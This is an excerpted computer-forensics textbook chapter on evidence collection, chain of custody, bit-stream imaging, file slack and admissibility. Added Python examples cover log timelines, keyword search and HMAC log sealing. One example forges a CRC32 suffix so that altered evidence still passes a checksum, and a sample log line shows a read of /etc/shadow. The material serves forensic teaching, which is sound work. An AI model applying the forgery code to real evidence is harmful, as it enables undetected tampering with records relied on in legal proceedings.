alteration of the originals (the removal of hardware components)
...
If you don’t follow them, you are probably
wasting your time and money
...
Do Not Exceed Your Knowledge
If you don’t understand what you are doing, you can’t account for any changes you
make and you can’t describe what exactly you did
...
Never soldier on regardless
...
Follow Your Local Security Policy
If you fail to comply with your company’s security policy, you may find yourself
with some difficulties
...
If in doubt, talk to those who know
...
Differences between the original system and the master
copy count as a change to the data
...
Be Prepared to Testify
If you’re not willing to testify to the evidence you have collected, you might as well
stop before you start
...
Remember that you may need to testify at a
later time
...
This also means that your plan of action shouldn’t be based
on trial-and-error
...
Volatile evidence may
vanish entirely if you don’t collect it in time
...
You must still collect accurate data
...
Automation of certain tasks makes collection proceed even faster
...
Because
of this, you should always try to collect the most volatile evidence first
...
Not
only do you lose any volatile evidence, but also the attacker may have trojaned (via
a trojan horse) the startup and shutdown scripts, plug-and-play devices may alter
the system configuration, and temporary file systems may be wiped out
...
As a general rule, until the compromised disk is finished with and restored, it should never be used as a boot disk
...
Any programs you use should be on read-only media (such as a
CD-ROM or a write-protected floppy disk) and should be statically linked
...
Some evidence resides in
storage that requires a consistent power supply; other evidence may be stored in information that is continuously changing [1]
...
Of course, you should still
take the individual circumstances into account
...
To determine what evidence to collect first, you should draw up an order of
volatility—a list of evidence sources ordered by relative volatility
...
GENERAL PROCEDURE
When collecting and analyzing evidence, there is a general four-step procedure you
should follow
...
You should customize the details to suit your situation
...
For this purpose,
you should know what the data is, where it is located, and how it is stored
...
Preservation of Evidence
The evidence you find must be preserved as close as possible to its original state
...
Analysis of Evidence
The stored evidence must then be analyzed to extract the relevant information and
recreate the chain of events
...
Always be sure that the person or people who are analyzing the evidence are fully qualified to do so
...
The manner of presentation is important, and it must be
understandable by a layman to be effective
...
A good presenter can help in this respect
...
Storage of that
data is also important, as it can affect how the data is perceived
...
It is important to keep these
logs secure and to back them up periodically
...
Remember, if the logs are kept locally on the compromised machine, they are susceptible
to either alteration or deletion by an attacker
...
Regular auditing and accounting of your system is useful not only for detecting
intruders but also as a form of evidence
...
Of course, you need a clean snapshot for
these to work, so there’s no use trying it after the compromise
...
Monitoring logs as they are created can often show you important information you
might have missed had you seen them separately
...
Information gathered while monitoring network traffic can be compiled into
statistics to define normal behavior for your system
...
You can also monitor the actions of your
users
...
Unusual activity or the
sudden appearance of unknown users should be considered definite cause for closer
inspection
...
There are
plenty of laws you could inadvertently break
...
You should also display a disclaimer stating what
monitoring is done when users log on
...
METHODS OF COLLECTION
There are two basic forms of collection: freezing the scene and honeypotting
...
You can collect frozen information after or during any
honeypotting
...
The necessary authorities should be notified (the police and your incident response and legal teams), but you shouldn’t go out and tell the world just yet
...
Make sure the programs and utilities used to collect the
data are also collected onto the same media as the data
...
Honeypotting is the process of creating a replica system and luring the attacker
into it for further monitoring
...
The placement of misleading information and the
attacker’s response to it is a good method for determining the attacker’s motives
...
Honeypotting and sandboxing are extremely resource intensive, so they
may be infeasible to perform
...
As previously mentioned, you should consult your lawyers
...
These are known as artifacts
...
You should never attempt to analyze
an artifact on the compromised system
...
Artifacts may be difficult to find; trojaned programs may be identical in all obvious ways to the originals (file size, medium access control [MAC] times, etc
...
If you are performing regular file integrity assessments, this
shouldn’t be a problem
...
COLLECTION STEPS
You now have enough information to build a step-by-step guide for the collection
of the evidence
...
You should customize it to your
specific situation
...
Find the evidence
...
Find the relevant data
...
Remove external avenues of change
...
Document everything
...
Use a checklist
...
Find the Relevant Data
Once you’ve found the evidence, you must figure out what part of it is relevant to
the case
...
Don’t spend hours collecting information that
is obviously useless
...
The order of volatility for your system is a good guide and ensures that
you minimize loss of uncorrupted evidence
...
Preventing anyone from tampering with the evidence helps
you create as exact an image as possible
...
The attacker may have been smart and left a dead-man switch
...
Collect the Evidence
You can now start to collect the evidence using the appropriate tools for the job
...
You may find that you
missed something important
...
Document Everything
Your collection procedures may be questioned later, so it is important that you
document everything you do
...
Don’t leave anything out
...
Originals should never be used in forensic examination; verified duplicates should be
used
...
Of course, any
tests done should be done on a clean, isolated host machine
...
A good way of ensuring that data remains uncorrupted is to keep a chain of
custody
...
Remember that this will be questioned later on, so document everything (who found the data, when and where it was transported [and how], who had
access to it, and what they did with it)
...
Analysis
Once the data has been successfully collected, it must be analyzed to extract the evidence you wish to present and to rebuild what actually happened
...
Your work will be
questioned and you must be able to show that your results are consistently obtainable from the procedures you performed
...
This can be particularly difficult when it comes to computers
...
One thing to remember is to never, ever change the clock on an affected
system
...
Log files usually use timestamps to indicate when an entry was added, and
these must be synchronized to make sense
...
You’re
not just reconstructing events, you yourself are making a chain of events that must
be accounted for as well
...
The incident may involve other time zones than your own, so using a
common reference point can make things much easier
...
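As an added example (not the book’s own code) of correlating logs to a common reference: each host’s documented time zone and measured clock skew are applied to its entries to build one UTC timeline, leaving every original system clock untouched. Host names, zones, skews and log lines are constructed assumptions.

```python
"""Merging logs from different time zones into one UTC timeline.

Added example, not code from the book. Each host logs in its own local zone
and its clock may be off by a measured amount. Nothing touches the original
systems' clocks: the examiner records zone and skew at acquisition and the
correction is applied here, as a documented and repeatable step. Hosts,
zones, skews and log lines below are constructed sample values.
"""
from datetime import datetime, timedelta, timezone

# Time zone each host logs in, as recorded when the evidence was collected (assumed).
HOST_TZ = {
    "web01": timezone(timedelta(hours=-6)),    # US Central Standard Time
    "fw01": timezone.utc,
    "pc-smith": timezone(timedelta(hours=1)),  # Central European Time
}

# Measured skew in seconds: (host clock) minus (trusted reference clock) (assumed).
CLOCK_SKEW = {"web01": 3600, "fw01": 0, "pc-smith": -125}

# Constructed log lines: (host, format, raw line).
SAMPLE_LINES = [
    ("web01", "apache", '10.0.0.5 - - [14/Mar/2004:02:15:07 -0600] "GET /admin HTTP/1.1" 401 -'),
    ("fw01", "iso", "2004-03-14T08:14:02Z DROP tcp 10.0.0.5:4312 -> 10.0.0.9:22"),
    ("pc-smith", "windows", "3/14/2004 9:13:40 AM  Logon  user=smith"),
]


def parse_local(host, fmt, line):
    """Return the timestamp as a timezone-aware datetime in the host's own zone."""
    if fmt == "apache":
        # Apache writes its own UTC offset, so the line is self-describing.
        stamp = line[line.index("[") + 1:line.index("]")]
        return datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
    if fmt == "iso":
        return datetime.strptime(line.split()[0], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    if fmt == "windows":
        # Event log exports carry no zone: attach the one documented for the host.
        stamp = " ".join(line.split()[:3])
        return datetime.strptime(stamp, "%m/%d/%Y %I:%M:%S %p").replace(tzinfo=HOST_TZ[host])
    raise ValueError("unknown log format: %s" % fmt)


def to_reference_utc(host, local_ts):
    """Convert to UTC and remove the host's measured skew (a fast clock is subtracted)."""
    return local_ts.astimezone(timezone.utc) - timedelta(seconds=CLOCK_SKEW[host])


def build_timeline(lines):
    """Return events sorted by corrected UTC time, keeping the raw line for the record."""
    events = []
    for host, fmt, line in lines:
        local_ts = parse_local(host, fmt, line)
        events.append({
            "utc": to_reference_utc(host, local_ts).isoformat(),
            "host": host,
            "local": local_ts.isoformat(),
            "skew_applied_s": CLOCK_SKEW[host],
            "raw": line,
        })
    # All "utc" strings carry +00:00, so lexical order is chronological order.
    return sorted(events, key=lambda e: e["utc"])


if __name__ == "__main__":
    for event in build_timeline(SAMPLE_LINES):
        print(event["utc"], event["host"], event["raw"])
```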
This examination host should be secure, clean (a fresh, hardened install of the operating system is a good idea), and isolated from any network
...
Once this system is available, you can commence analysis of the backups
...
You can simply restore the backups again if required
...
Ensure
that what you do is repeatable and capable of always giving the same results
...
You must correlate all the
evidence you have gathered (which is why accurate timestamps are critical), so it’s
probably best to use graphical tools, diagrams, and spreadsheets
...
You may miss something if you leave a piece of evidence out
...
There
are many complexities you must consider, and you must always be able to justify
your actions
...
The right tools and knowledge of
how everything works is all you need to gather the evidence required
...
Operating systems are hardened, firewalls are
installed, intrusion detection systems are put in place, honeypots are implemented,
security policies and procedures are established, security awareness programs are
rolled out, and systems are monitored
...
When unauthorized access does occur, the last line of defense is legal action
against the intruder
...
It is important to remember one of the
basic rules of our legal system: if there is no evidence of a crime, there is no crime
in the eyes of the law
...
Some of the most common reasons for improper evidence collection are poorly
written policies, lack of an established incident response plan, lack of incident response training, and a broken chain of custody
...
Conclusions
Admissible is the most basic rule (the evidence must be able to be used in court
or otherwise)
...
It’s not enough to collect evidence that just shows one perspective of the incident
...
Your evidence collection and analysis procedures must not cast doubt on the
evidence’s authenticity and veracity
...
There are six fundamental rules to guide an investigator during a search and
seizure
...
In
other words, the rules help ensure an investigation’s chain of custody, which is
critical to the success of any case
...
Without these activities, the chain of custody is put at
great risk
...
Crime scene security may range from locking doors to (for law enforcers)
arresting trespassers
...
The search for evidence can involve looking in a variety of places, but the legalities of searching must always be considered
...
An Agenda for Action
When completing the Evidence Collection and Data Seizure Checklist (Table F6
...
The order is not significant; however, these are the activities for which the researcher would want to provide a detailed description of procedures, review, and assessment for ease of use and admissibility
...
Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
The
processes are strict and exhaustive, the systems affected may be unavailable for
regular use for a long period of time, and analysis of the data collected must be
performed
...
True or False? Once a compromise has been detected, you have two options:
pull the system off the network and begin collecting evidence or leave it offline
and attempt to monitor the intruder
...
Make sure you always document the following points, except:
A
...
Who took possession of it
C
...
How it was stored and unprotected
E
...
Make sure you always label any hardware with the following, except:
A
...
A case number
C
...
The time and date you got the evidence
E
...
There are five rules of collecting electronic evidence
...
Unadmissible
B
...
Complete
D
...
Believable
4
...
Minimize handling/corruption of original data
B
...
Comply with the six rules of evidence
D
...
Follow your local security policy
5
...
An example
of an order of volatility would be the following, except:
A
...
Routing tables
C
...
Process table
E
...
Why would
a CFS be called in to solve a teenage runaway case? What would his role be here?
HANDS-ON PROJECTS
A parent was concerned that her son was accessing pornographic Web sites from
his computer
...
How would a CFS go about investigating this incident?
Case Project
An adult roommate was accused of using another’s computer to make unauthorized purchases on a popular Internet shopping site
...
The
former employee filed a lawsuit accusing her superiors at the company of sexual
harassment and wrongful termination
...
REFERENCES
[1] Vacca, John R
...
[2] Braid, Matthew, “Collecting Electronic Evidence After a System Compromise,” Australian Computer Emergency Response Team (AusCERT), The
University of Queensland, Qld 4072 Australia (SANS Institute, 5401 Westbard Ave
...
7 Duplication and Preservation of Digital Evidence
Computer evidence is odd, to say the least
...
Two of these
levels are not visible to the computer user
...
Electromagnets and planted destructive trojan horse programs are other
hazards that can permanently destroy computer evidence within seconds
...
In the old days, defense lawyers didn’t know much
about computer evidence
...
However, things are changing because
lawyers are becoming educated because of the current popularity of electronic
document discovery in the legal community
...
Nevertheless, computer forensic evidence is frequently challenged in court
...
There’s also some confusion over the legal classification
of computer evidence
...
The complexity of the criminal law means that the overwhelming majority of cases do not
make it to civil or criminal court, but should [1]
...
1. Authentication
2. Best evidence
3. Exceptions to the hearsay rule [1]
Authentication means showing a true copy of the original; best evidence means
presenting the original; and the allowable exceptions are when a confession or business or official records are involved
...
Some say documentation (of what has been
done); others say preservation (the integrity of the original); still others say authenticity (the evidence being what you say it is)
...
If your documentation is poor, it will look like your processing procedures
were poor, and when you testify in court, you will look ridiculous since you have no
good written record to refresh your memory
...
In general, the condition of all evidence has to be documented
...
Then, the
laboratory worker (forensic scientist or criminalist) figures out what tests are appropriate, decides on what part of the evidence to examine first, dissects or copies
the part to be tested (specimen = dissection; exemplar = copying), and prepares the
testing ground, all the while documenting each decision step
...
If your preservation is poor, it becomes fairly evident that your collection and
transportation of evidence gives rise to numerous possibilities for error in the form of
destruction, mishandling, and contamination
...
The basic chain of
custody, for example, involves at least three initial sources of error
...
Once it gets to the lab, it
has to be logged in, assigned an identification number, placed in storage, and kept
from intermingling with other evidence
...
Some workplaces are required to meet the standards of professional accrediting organizations
...
The quality assurance
policy, for example, must act as a check on quality control
...
If your authenticity is poor, then you, your agency, and the prosecutor will look like inexperienced rookies, not so much foolish, but like rank amateurs who can’t explain, for example, how an “MD5 Hash algorithm” works
...
The old common law standard is oculis subjecta
fidelibus, as it is for any piece of demonstrative evidence (like a plaster cast model;
if the scale is 1:10, an average person ought to be able to visualize the larger thing
to scale)
...
Only the Marx standard resembles the old common law standard, and it’s only found in a handful of jurisdictions
...
Frye standard (Frye v. U.S.)
...
This is a “general acceptance” test
...
State, 1968): The court allows a novel test or
piece of new, sometimes controversial, science on a particular problem at hand
if an adequate foundation can be laid, even if the profession as a whole isn’t familiar with it
...
Marx, 1975): The court is satisfied that it did not have to
sacrifice its common sense in understanding and evaluating the scientific expertise put before it
...
Daubert standard (Daubert v
...
The federal courts were the first to recognize that files on computers were similar, but unlike, files kept on paper
...
Therefore, a modern clause exists in the
Federal Rules of Evidence (FRE 1001-3) that states, If data are stored by computer
or similar device, any printout or other output readable by sight, shown to reflect
the data accurately, is an original [1]
...
The history of computers in the
courtroom ties in with demonstrative standards, and computer forensics, after all, is
about reconstructing the crime, or criminalistics
...
Digital evidence is the most
easily lost evidence
...
You need to be able to demonstrate that the evidence is what you
say it is, came from where you say it did, and has not been modified in any way since
you obtained it
...
It’s futile to talk about any one correct way to do
it, or any perfect printout
...
Now let’s look at some of the emerging principles of duplication and preservation of digital evidence collection and handling
...
PRESERVING THE DIGITAL CRIME SCENE
The computer investigator not only needs to be worried about destructive process
and devices being planted by the computer owner, he or she also needs to be concerned about the operating system of the computer and applications
...
Unfortunately potential evidence can also reside in file slack, erased files, and
the Windows swap file
...
When Windows starts, it potentially creates
new files and opens existing ones as a normal process
...
Furthermore, all of the Windows operating systems
(Windows 2000, XP and especially 2003) have a habit of updating directory entries
for files as a normal operating process
...
Another concern of the computer investigator is the running of any programs
on the subject computer
...
Perpetrators could modify the operating system such that the execution of the DIR
command destroys simulated evidence
...
Even trusted word processing programs such as Microsoft Word and WordPerfect™ can become the enemy of the cyber cop
...
These files overwrite the temporary files that existed previously, and
potential evidence stored in those files can be lost forever
...
Computer evidence processing is risky business and is fraught with potential
problems
...
What will your answer be if the defense
attorney claims the data you destroyed proved the innocence of his or her client?
You had better have a good answer
...
The objective of this
section is to keep Murphy’s law from ruining your case
...
He stands
ready to strike at just the wrong moment
...
This
should normally be done before the computer is operated
...
These basic rules of evidence never change
...
As stated previously, evidence can reside at multiple levels and in bizarre storage locations
...
It is not enough to do a standard backup of a hard
disk drive
...
Without backing up evidence in these unique areas, the evidence is susceptible to
damage and modification by the computer investigator
...
They involve copying of every bit of
data on a storage device, and it is recommended that two such copies be made of
the original when hard disk drives are involved
...
As previously recommended, the original evidence should be preserved at all costs
...
The importance of bit stream image backups cannot be stressed enough
...
The basic rule is that only on rare occasions
should you process computer evidence without first making an image backup
...
To avoid getting too technical for the purposes of this chapter, specifics regarding the uses of these backup programs will be avoided
...
Ideally, you should conduct tests on your own computers beforehand and
compare the results with the original computer evidence
...
Know
your tools
...
You may only get one chance to do it right
...
Even the normal operation
of the computer can destroy computer evidence that might be lurking in unallocated space, file slack, or in the Windows swap file
...
Every case is
different, and flexibility on the part of the computer investigator is important
...
Remember that these do not represent the only true way of processing computer evidence
...
Document the hardware configuration of the system
...
Make bit stream backups of hard disks and floppy disks
...
Document the system date and time
...
Evaluate the Windows swap file
...
Evaluate unallocated space (erased files)
...
Document file names, dates, and times
...
Evaluate program functionality
...
Retain copies of software used [2]
...
EMERGENCY GUIDELINES
The popularity of desktop and notebook computers has come with a mixed blessing
...
However, they
also provide opportunities for abuse of corporate policies and the commission of
computer-related crimes
...
Embezzlements using computers have become commonplace in small- and medium-size businesses
...
They can
also be used to find and document evidence in a civil or criminal case
...
As a result, it is important that
things are done correctly as soon as a computer incident is identified
...
Don’t turn on or operate the subject computer
...
Don’t solicit the assistance of the resident “computer expert”
...
Don’t evaluate employee email unless corporate policy allows it
...
DON’T TURN ON OR OPERATE THE SUBJECT COMPUTER
The computer should first be backed up using bit stream backup software
...
Internet activity and fragments of Windows work sessions exist in the
Windows swap file
...
For that matter, the same is true of a Windows system
...
DON’T SOLICIT THE ASSISTANCE OF THE RESIDENT COMPUTER EXPERT
The processing of computer evidence is tricky to say the least
...
Like any other
science, computer science has its areas of specialty
...
In some cases, valuable evidence is lost or the evidence is so tainted that it
loses its evidentiary value
...
Do this
before you turn on the computer
...
If
your corporate policy specifically states that all computers and data stored on them
belongs to the corporation, then you are probably on safe ground
...
Furthermore, it is always a good idea to check with corporate counsel
...
To do otherwise could subject you and your corporation to a lawsuit [4]
...
At the option of the computer investigator, pictures of the
screen image can be taken
...
These can be in memory or available through a connected modem
...
This
can complicate the shutdown of the computer
...
Document the Hardware Configuration of the System
It is assumed that the computer system will be moved to a secure location where a
proper chain of custody can be maintained and evidence processing can begin
...
Labeling each wire is also important, so that it can easily be reconnected when the system configuration is restored to its original condition at a secure location
...
War stories can be told about this one that relate to both law
enforcement agencies and corporations
...
All too often, individuals operate seized computers without knowing that they
are destroying potential evidence and the chain of custody
...
Evidence can be
planted on it and crucial evidence can be intentionally destroyed
...
Lacking a
proper chain of custody, how can you say that relevant evidence was not planted
on the computer after the seizure? The answer is that you cannot
...
Make Bit Stream Backups of Hard Disks and Floppy Disks
The computer should not be operated, and computer evidence should not be
processed until bit stream backups have been made of all hard disk drives and floppy
disks
...
The original evidence should be left untouched unless compelling circumstances exist
...
It is fragile and can easily be altered or destroyed
...
Bit stream backups are much like an insurance policy and are essential for any serious computer evidence processing
...
Such proof will help you rebut allegations
that you changed or altered the original evidence
...
Mathematically, a 32-bit validation value (in practice a CRC32 checksum) can take only about 4 billion (2^32) distinct values, so the chance of an accidental match is roughly one in 4
...
However, given the speed of today’s computers and the vast storage capacity of today’s hard disk drives, this level of assurance is no longer adequate: a 32-bit value can be matched by brute force in seconds, and because CRC32 is a linear function of its input, a deliberate change to the data can be made to produce any chosen checksum, so it proves nothing against an adversary who wants the copy to look unaltered
...
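The following is an added illustration, not code from the book or from any forensic product, of why a 32-bit validation value cannot serve as proof of integrity. It uses Python’s standard library only; the sample "image" bytes are constructed here. It alters a constructed piece of evidence and then computes four trailing bytes that drive the CRC32 back to the original value, which a SHA-256 digest of the same data immediately exposes.

```python
import hashlib
import zlib

# Reflected CRC-32 table (polynomial 0xEDB88320), the same algorithm zlib.crc32 uses.
CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    CRC_TABLE.append(_c)
# The high byte of each table entry is unique, so it identifies the table index.
INDEX_BY_HIGH_BYTE = {entry >> 24: i for i, entry in enumerate(CRC_TABLE)}


def forge_crc32_suffix(data: bytes, target_crc: int) -> bytes:
    """Return 4 bytes such that zlib.crc32(data + suffix) == target_crc.

    CRC32 is an affine function of its input, so four appended bytes give exactly
    the 32 degrees of freedom needed to steer the register to any value. Walking
    the table backwards from the wanted final register recovers the table indices
    the last four steps must use; walking forwards from the real register state
    then yields the bytes that select those indices.
    """
    wanted_state = target_crc ^ 0xFFFFFFFF          # zlib applies a final XOR
    indices = []
    state = wanted_state
    for _ in range(4):                               # backwards: last byte first
        i = INDEX_BY_HIGH_BYTE[state >> 24]
        indices.append(i)
        state = ((state ^ CRC_TABLE[i]) << 8) & 0xFFFFFFFF
    indices.reverse()

    state = zlib.crc32(data) ^ 0xFFFFFFFF            # real register after `data`
    suffix = bytearray()
    for i in indices:                                # forwards: choose each byte
        suffix.append(i ^ (state & 0xFF))
        state = CRC_TABLE[i] ^ (state >> 8)
    return bytes(suffix)


def suffix_hits_target(data: bytes, target_crc: int) -> bool:
    """Self-check helper: does the forged suffix really produce the target CRC?"""
    return zlib.crc32(data + forge_crc32_suffix(data, target_crc)) == target_crc


def tamper_and_match(original: bytes, old: bytes, new: bytes) -> dict:
    """Replace `old` with `new` in `original`, then overwrite the last 4 bytes with
    a forged suffix so the 32-bit check still matches; report what each
    verification method says about the result."""
    assert len(old) == len(new), "keep the tampered copy the same size"
    forged = original.replace(old, new, 1)
    forged = forged[:-4] + forge_crc32_suffix(forged[:-4], zlib.crc32(original))
    return {
        "crc32_matches": zlib.crc32(forged) == zlib.crc32(original),
        "sha256_matches": hashlib.sha256(forged).digest() == hashlib.sha256(original).digest(),
        "content_changed": forged != original,
    }


# Constructed sample "evidence": a text-file-sized blob ending in 4 bytes of filler
# (a real image ends in unallocated space, which serves an attacker just as well).
SAMPLE_IMAGE = b"journal.txt: meeting with the broker on 14 March\x00\x00\x00\x00"

if __name__ == "__main__":
    print(tamper_and_match(SAMPLE_IMAGE, b"14 March", b"15 March"))
```

The point for the examiner is not that CRC32 is useless (it still catches accidental copy errors) but that it cannot rebut an allegation of deliberate alteration; record a SHA-256 (or stronger) digest of every image, and of the original drive where it can be read, in the evidence notebook.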
Document the System Date and Time
The dates and times associated with computer files can be extremely important
from an evidence standpoint
...
Before the system is shut down, record the system clock against a trusted reference clock and note the configured time zone, because file timestamps are only meaningful relative to that offset
...
If the system clock is one hour slow because of daylight-savings time,
then file timestamps will also reflect the wrong time
...
Make a List of Key Search Words
Because modern hard disk drives are so voluminous, it is all but impossible for a
computer specialist to manually view and evaluate every file on a computer hard disk drive
...
Usually some information is known
about the allegations, the computer user, and the alleged associates who may be involved
...
Such keywords can be used in the
search of all computer hard disk drives and floppy diskettes using automated software
...
In such cases, the
words should be surrounded with spaces
...
In
the past, this tedious task was done with hex editors, and it took days to evaluate just one Windows swap file
...
When Windows 2000, XP, and 2003 are involved, the paging file (pagefile.sys, the successor of the Windows swap file) may be configured to grow and shrink dynamically as the computer is operated
...
However, all is not lost, because the content of the swap file can easily be
captured and evaluated
...
It is a source of significant security leakage: on older systems (DOS and Windows 9x) the tail of a file’s last sector was padded with whatever happened to be in memory when the file was closed (so-called RAM slack), and the remaining sectors of the cluster keep whatever was written there before (drive slack)
...
Modern NTFS zero-fills the sector tail, so on current systems it is the drive slack that still yields residual data
...
Specialized forensic tools are required to view and evaluate the file
slack; file slack can provide a wealth of information and investigative leads
...
On a well-used hard disk drive, as much as 1
...
File slack should be evaluated for relevant keywords
to supplement the keywords identified in the previous steps
...
Because of the
nature of file slack, specialized and automated forensic tools are required for evaluation
...
Tests suggest that file
slack provides approximately 80 times more Internet leads than the Windows swap
file
...
Duplication and Preservation of Digital Evidence
Evaluate Unallocated Space (Erased Files)
On a well-used hard disk drive, billions of bytes of storage space may contain data
associated with previously erased files
...
Such keywords should be added to the computer investigator’s list of keywords for
use in the next processing step
...
Unallocated space is typically a good source of data that was previously associated with word processing temporary files and other temporary files
created by various computer applications
...
Several forensic
text search utilities are available in the marketplace
...
It is important to review the output of the text search utility and equally important to document relevant findings
...
When new keywords are identified, they should be added to the
list, and a new search should be conducted using the text search utility
...
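The keyword, file slack, and unallocated space steps above are the same scan applied to three regions of the raw disk. As an added example (not from the book and not any commercial forensic utility), the following Python builds a small constructed eight-sector image in which a deleted memo has been partly overwritten by two live files, then searches the raw bytes for whole-word keywords and labels every hit as allocated, file slack, or unallocated. The sector size, the allocation table layout, and the sample contents are all assumptions made here.

```python
import re

SECTOR = 512


def region_for(offset: int, files) -> tuple:
    """Classify a byte offset against a constructed allocation table of
    (file name, first byte, logical size). A file owns whole sectors, so bytes
    between its logical end and the end of its last sector are file slack;
    sectors owned by no file are unallocated."""
    for name, start, size in files:
        phys_end = start + -(-size // SECTOR) * SECTOR      # round up to a sector
        if start <= offset < start + size:
            return "allocated", name
        if start + size <= offset < phys_end:
            return "slack", name
    return "unallocated", None


def keyword_search(image: bytes, keywords, files, context: int = 20) -> list:
    """Scan raw image bytes (not the file system) for whole-word keyword hits and
    label each hit with the region it falls in. Whole-word matching is what the
    text means by surrounding a keyword with spaces: 'count' must not match
    'accountant'."""
    hits = []
    for kw in keywords:
        pattern = re.compile(rb"(?<![A-Za-z0-9])" + re.escape(kw) + rb"(?![A-Za-z0-9])",
                             re.IGNORECASE)
        for m in pattern.finditer(image):
            region, owner = region_for(m.start(), files)
            lo, hi = max(0, m.start() - context), min(len(image), m.end() + context)
            hits.append({"keyword": kw.decode(), "offset": m.start(), "region": region,
                         "file": owner, "context": image[lo:hi]})
    return hits


def build_sample_image() -> tuple:
    """Constructed 8-sector image: a memo once filled the whole disk and was deleted;
    afterwards budget.txt (700 bytes, two sectors, 324 bytes of slack) and
    readme.txt (1024 bytes, two full sectors) were written over the first four
    sectors. Sectors 4-7 are unallocated and still hold the memo."""
    memo = b"MEMO: wire 250000 to offshore account 7731 before audit. "
    disk = bytearray((memo * 100)[: 8 * SECTOR])
    budget = (b"Q3 budget: travel 12000, hardware 9000, misc 400.\n" * 20)[:700]
    readme = (b"README: nothing of interest here. " * 40)[:1024]
    disk[0:700] = budget
    disk[1024:2048] = readme
    files = [("budget.txt", 0, 700), ("readme.txt", 1024, 1024)]
    return bytes(disk), files


def hit_counts(keyword: bytes = b"offshore") -> dict:
    """How many hits for one keyword land in each region of the sample image."""
    image, files = build_sample_image()
    counts = {"allocated": 0, "slack": 0, "unallocated": 0}
    for h in keyword_search(image, [keyword], files):
        counts[h["region"]] += 1
    return counts


if __name__ == "__main__":
    image, files = build_sample_image()
    for h in keyword_search(image, [b"offshore", b"7731"], files)[:4]:
        print(h["offset"], h["region"], h["file"], h["context"])
    print(hit_counts())
```

Every hit for "offshore" comes from slack or unallocated space; a search of the live files alone would find nothing. When a hit turns up a new name or number (here the account number 7731), it goes on the keyword list and the scan is run again, exactly as the steps above describe.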
Document File Names, Dates, and Times
From an evidence standpoint, file names, creation dates, and last modified dates
and times can be relevant
...
The file listing should be sorted based on the file name, file size, file content,
creation date, and last modified date and time
...
The output should be in the form of a word-processing-compatible file that can be used to help document computer evidence
issues tied to specific files
...
As a result,
text data stored in these file formats cannot be identified by a text search program
...
Depending on the type of file involved, the contents should
be viewed and evaluated for its potential as evidence
...
When
hidden partitions are found, they should be evaluated for evidence and their existence should be documented
...
The Recycle Bin is
the repository of files selected for deletion by the computer user
...
If relevant files are found, the issues involved should be documented
thoroughly
...
When destructive processes that are tied to relevant evidence are discovered, this can be used to prove willfulness
...
Document Your Findings
As indicated in the preceding steps, it is important to document your findings as issues are identified and as evidence is found
...
Be sure you are legally licensed to use the forensic software
...
Smart
defense lawyers will usually question software licensing; you don’t want to testify
that you used unlicensed software in the processing of computer evidence
...
When appropriate, mention in your documentation that you are licensed to use
the forensic software involved
...
Retain Copies of Software Used
Finally, as part of your documentation process, it is recommended that a copy of the
software used be included with the output of the forensic tool involved
...
When this documentation methodology is followed, it eliminates confusion (about which version of the software was used to create the output)
at trial time
...
Duplication of results can be difficult or impossible to achieve if the software has been upgraded and the original version used was not retained
...
LEGAL ASPECTS OF COLLECTING AND PRESERVING COMPUTER
FORENSIC EVIDENCE
Some of the most common reasons for improper evidence collection are poorly
written policies, lack of an established incident response plan, lack of incident response training, and a broken chain of custody
...
The remainder of this chapter focuses on the procedure a
private organization should follow in collecting computer forensic evidence to
maintain chain of custody
...
Establishing a clear chain of custody is crucial because electronic evidence can be
easily altered
...
Preserving a chain of custody for electronic evidence, at a minimum,
requires proving that:
No information has been added or changed
...
A reliable copying process was used
...
Proving this chain is unbroken is a prosecutor’s primary tool in authenticating
electronic evidence
...
These legal requirements are vast, complex, and vary from country to country
...
U.S. Code Title 28, Section 1732 provides that log files are admissible as evidence if they
are collected in the regular course of business
...
This means you’d be much safer to log everything all the time and deal with
the storage issues than to turn on logging only after an incident is suspected
...
Another factor in the admissibility of log files is the ability to prove that they
have not been subject to tampering
...
Other protective measures include, but are not limited to, storing logs on a dedicated logging server and encrypting log files
...
Therefore, due
diligence should be applied in protecting them
...
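Proving that logs have not been tampered with is easier if every line is sealed as it is written. The following is an added example, not from the book, of one way to do that on the dedicated logging server the text recommends: each line gets a keyed hash (HMAC-SHA256) that also covers the previous line’s tag, so editing, reordering, or deleting any earlier line breaks every tag after it. The sample syslog lines and the server key are constructed for the example; in practice the key exists only on the log server, never on the hosts that send the lines.

```python
import hashlib
import hmac

# Constructed sample log lines (syslog style).
SAMPLE_LINES = [
    "Mar 14 02:11:07 web1 sshd[4121]: Accepted password for admin from 10.0.0.9",
    "Mar 14 02:11:42 web1 sudo: admin : TTY=pts/0 ; COMMAND=/bin/cat /etc/shadow",
    "Mar 14 02:12:03 web1 sshd[4121]: session closed for user admin",
]
SERVER_KEY = b"example-only-log-server-key"     # assumption: held by the log server only
GENESIS = b"\x00" * 32


def chain_tag(key: bytes, prev_tag: bytes, line: str) -> bytes:
    # Each tag commits to the line and to the previous tag, so removing, reordering
    # or editing any earlier line breaks every tag that follows it.
    return hmac.new(key, prev_tag + line.encode(), hashlib.sha256).digest()


def seal_log(lines, key: bytes = SERVER_KEY) -> list:
    """Return [(line, tag_hex)] with tags chained from GENESIS."""
    sealed, prev = [], GENESIS
    for line in lines:
        prev = chain_tag(key, prev, line)
        sealed.append((line, prev.hex()))
    return sealed


def verify_log(sealed, key: bytes = SERVER_KEY):
    """Return None if the chain is intact, else the index of the first bad entry."""
    prev = GENESIS
    for i, (line, tag_hex) in enumerate(sealed):
        expected = chain_tag(key, prev, line)
        if not hmac.compare_digest(expected.hex(), tag_hex):
            return i
        prev = expected
    return None


def demo() -> dict:
    """Seal the sample, then show that an edited line and a dropped line are caught."""
    good = seal_log(SAMPLE_LINES)
    edited = list(good)
    edited[1] = (edited[1][0].replace("/etc/shadow", "/etc/motd"), edited[1][1])
    truncated = good[:1] + good[2:]          # the sudo line silently removed
    return {"intact": verify_log(good),
            "edited": verify_log(edited),
            "truncated": verify_log(truncated)}


if __name__ == "__main__":
    print(demo())
```

The scheme has one obvious limit, which the evidence notebook should acknowledge: whoever holds the server key can re-seal a rewritten log. Copying the latest tag periodically to a place the log server cannot alter (a printed daily digest, a separate host, write-once media) lets an examiner show that the tail of the log was not rewritten after the fact.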
